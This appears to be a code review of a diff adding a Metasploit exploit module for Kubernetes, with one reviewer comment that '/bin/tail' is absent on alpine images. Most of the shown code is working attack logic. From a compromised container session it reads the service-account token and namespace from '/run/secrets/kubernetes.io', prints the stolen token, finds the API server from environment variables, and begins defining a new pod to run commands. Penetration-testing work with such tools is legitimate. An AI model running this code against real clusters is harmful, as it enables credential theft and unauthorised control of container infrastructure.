modules/exploits/multi/kubernetes/exec.rb

```diff
@@ -0,0 +1,321 @@
+  end
+
+  def api_token
+    @api_token || datastore['TOKEN']
+  end
+
+  def rhost
+    @rhost || datastore['RHOST']
+  end
+
+  def rport
+    @rport || datastore['RPORT']
+  end
+
+  def namespace
+    @namespace || datastore['NAMESPACE']
+  end
+
+  def pod_name
+    @pod_name || datastore['POD']
+  end
+
+  def configure_via_session
+    vprint_status("Configuring options via session #{session.sid}")
+
+    unless directory?('/run/secrets/kubernetes.io')
+      # This would imply that the target is not a Kubernetes container
+      fail_with(Failure::NotFound, 'The kubernetes.io directory was not found')
+    end
+
+    if api_token.blank?
+      token = read_file('/run/secrets/kubernetes.io/serviceaccount/token')
+      fail_with(Failure::NotFound, 'The API token was not found, manually set the TOKEN option') if token.blank?
+
+      print_good("API Token: #{token}")
+      @api_token = token
+    end
+
+    if namespace.blank?
+      ns = read_file('/run/secrets/kubernetes.io/serviceaccount/namespace')
+      fail_with(Failure::NotFound, 'The namespace was not found, manually set the NAMESPACE option') if ns.blank?
+
+      print_good("Namespace: #{ns}")
+      @namespace = ns
+    end
+
+    service_host = service_port = nil
+    if rhost.blank?
+      service_host = get_env('KUBERNETES_SERVICE_HOST')
+      fail_with(Failure::NotFound, 'The KUBERNETES_SERVICE_HOST environment variable was not found, manually set the RHOSTS option') if service_host.blank?
+
+      @rhost = service_host
+    end
+
+    if rport.blank?
+      service_port = get_env('KUBERNETES_SERVICE_PORT')
+      fail_with(Failure::NotFound, 'The KUBERNETES_SERVICE_PORT environment variable was not found, manually set the RPORT option') if service_port.blank?
+
+      @rport = service_port.to_i
+    end
+
+    if service_host || service_port
+      service = "#{Rex::Socket.is_ipv6?(service_host) ? '[' + service_host + ']' : service_host}:#{service_port}"
+      print_good("Kubernetes service host: #{service}")
+    end
+  end
+
+  def connect_ws(opts = {}, *args)
+    opts['comm'] = session
+    opts['vhost'] = rhost
+    super
+  end
+
+  def send_request_raw(opts = {}, *args)
+    opts['comm'] = session
+    opts['vhost'] = rhost
+    super
+  end
+
+  def create_pod
+    random_identifiers = Rex::RandomIdentifier::Generator.new({
+      first_char_set: Rex::Text::LowerAlpha,
+      char_set: Rex::Text::LowerAlpha + Rex::Text::Numerals
+    })
+
+    image_name = @kubernetes_client.list_pods(namespace).dig(:items, 0, :spec, :containers, 0, :image)
+    print_status("Using image: #{image_name}")
+
+    new_pod_definition = {
+      apiVersion: 'v1',
+      kind: 'Pod',
+      metadata: {
+        name: random_identifiers[:pod_name],
+        labels: {}
+      },
+      spec: {
+        containers: [
+          {
+            name: random_identifiers[:container_name],
+            image: image_name,
+            command: %w[/bin/tail -f /dev/null],
```

Comment:
Not every container will have `tail` at this location, for instance alpine containers:

```
docker run --rm -it ruby:alpine /bin/sh
/ # which tail
/usr/bin/tail
/ # /bin/tail
/bin/sh: /bin/tail: not found
```